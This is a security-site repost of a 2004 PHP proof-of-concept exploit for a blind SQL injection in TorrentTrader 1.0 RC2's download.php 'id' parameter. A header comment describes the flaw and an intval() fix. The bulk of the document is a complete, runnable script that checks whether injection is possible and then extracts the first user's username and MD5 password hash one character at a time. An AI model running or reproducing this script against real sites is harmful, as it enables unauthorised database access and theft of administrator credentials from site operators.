首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TorrentTrader 1.0 RC2 SQL Injection Exp
来源:vfocus.net 作者:aCiDBiTS 发布时间:2004-09-11  

TorrentTrader 1.0 RC2 SQL Injection Proof of Concept

#!/usr/bin/php

<?

/*

TorrentTrader 1.0 RC2 SQL Injection Proof of Concept
By aCiDBiTS acidbits@hotmail.com 31-August-2004

"TorrentTrader (http://www.torrenttrader.com/) is a feature packed
and
highly customisable open-source BitTorrent tracker."

This PoC dumps the username and password's md5 hash of first user
in
TorrentTrader web application database, that should be the administrator.
First it fetchs a valid torrent id, then it determines if database's user
can perform "union select" and finally obtains the username and
md5(password). Tested on TorrentTrader 1.0 RC2, maybe older versions also
vulnerable.

Usage (in my debian box):
php4 -q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade"


++ Vulnerability description & workaround++

There is no user input sanization for parameter "id" in
download.php prior
beeing used in a SQL query. This can be exploited to manipulate SQL
queries
by injecting arbitrary SQL code. A workaround to solve this is to modify
download.php, line13:

$res = mysql_query("SELECT filename FROM torrents WHERE id =
$id");

With:

$res = mysql_query("SELECT filename FROM torrents WHERE id =
".intval($id));


*/


echo "+----------------------------------------------------------+\n|
TorrentTrader 1.0 RC2 SQL Injection Proof of Concept |\n| By aCiDBiTS
acidbits@hotmail.com 31-August-2004
|\n+----------------------------------------------------------+\n\n";


if($argc<2) die("Usage: ".$argv[0]."
URL_to_TorrentTrader_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "[+] Getting valid torrent id ... ";
$webc=get_web($host);
$temp=explode("torrents-details.php?id=",$webc);
$id=intval($temp[1]);
if( !$id ) die( "Failed!\n\n");
echo "OK\n Using Torrent id: $id\n\n";

echo "[+] Checking if injection is possible ... ";
$bas=$id."%20and%200%20union%20select%201%20from%20users%20where%20";
if( test_cond( $bas."1" ) && !test_cond( $bas."0" ) ) echo " OK\n\n";
else
die ("\n\n Failed! \n\n");

echo "[+] Getting username & password ... \n Username: ";
get_field( "username");
echo "\n MD5(Password): ";
get_field( "password" );

die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
//||\\\\\n\n");


function test_cond( $cond )
{
global $host;
$res=get_web( $host."download.php?id=".$cond);
if( eregi( "The ID has been found on the Database, but the torrent has
gone!", $res ) )
return 1;
else return 0;
}


function get_field( $field )
{
global $bas;
$unval= "
0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$idx=1;
$min=0;
$max=strlen($unval);
while($min!=$max) {
$mid=$min+(($max-$min)/2);
if(
test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1)))
) {
$idx++;
echo substr($unval,$mid,1);
$min=0;
$max=strlen($unval);
if(
!test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))") )
return;
} else {
if(
test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1)))
) $max=$mid;
else $min=$mid;
}
}
die( "\n\nUnexpected error!\n\n");
}


function get_web($url)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}


/* \ /
(Oo)
//||\\ */

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Courier-IMAP <= 3.0.2-r1 au
·cdrdao local root exploit
·AOL Instant Messenger AIM "Awa
·Citadel/UX <= 6.23 Remote U
·注射MSSQL时解决的一个未有人提
·PHP-Nuke 7.4 SQL Injection Exp
·WFTPD Pro Server 3.21 MLST Rem
·Trillian 0.74i Remote Buffer O
·TiTan FTP Server Long Command
·Citadel/UX<= 6.23 Remote US
·D-Link DCS-900 camera Remote E
·Cdrecord Local Root Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved